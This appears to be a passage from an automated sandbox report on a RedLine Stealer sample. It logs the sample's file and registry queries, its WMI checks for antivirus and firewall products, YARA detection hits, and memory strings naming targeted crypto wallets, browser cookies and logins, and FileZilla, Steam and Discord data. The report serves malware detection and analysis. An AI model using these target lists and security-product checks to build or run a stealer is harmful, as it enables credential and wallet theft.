                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeQueries volume information: C:\Users\user\Desktop\l2rMtmFkD6.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeQueries volume information: C:\Users\user\AppData\Roaming\ECcZgk.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeQueries volume information: C:\Users\user\AppData\Roaming\ECcZgk.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2206377067.0000000001526000.00000004.00000020.00020000.00000000.sdmp, l2rMtmFkD6.exe, 00000008.00000002.2226389329.000000000844E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 11.2.ECcZgk.exe.37f0c38.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.l2rMtmFkD6.exe.3a80450.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.l2rMtmFkD6.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.ECcZgk.exe.37d8e18.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.l2rMtmFkD6.exe.3a68630.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.ECcZgk.exe.37f0c38.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.ECcZgk.exe.37d8e18.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.l2rMtmFkD6.exe.3a80450.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.l2rMtmFkD6.exe.3a68630.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2194835748.00000000037D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: l2rMtmFkD6.exe PID: 6156, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: l2rMtmFkD6.exe PID: 3524, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ECcZgk.exe PID: 1848, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ECcZgk.exe PID: 3920, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: l2rMtmFkD6.exe, 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                    Source: l2rMtmFkD6.exe, 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: l2rMtmFkD6.exe, 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: l2rMtmFkD6.exe, 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
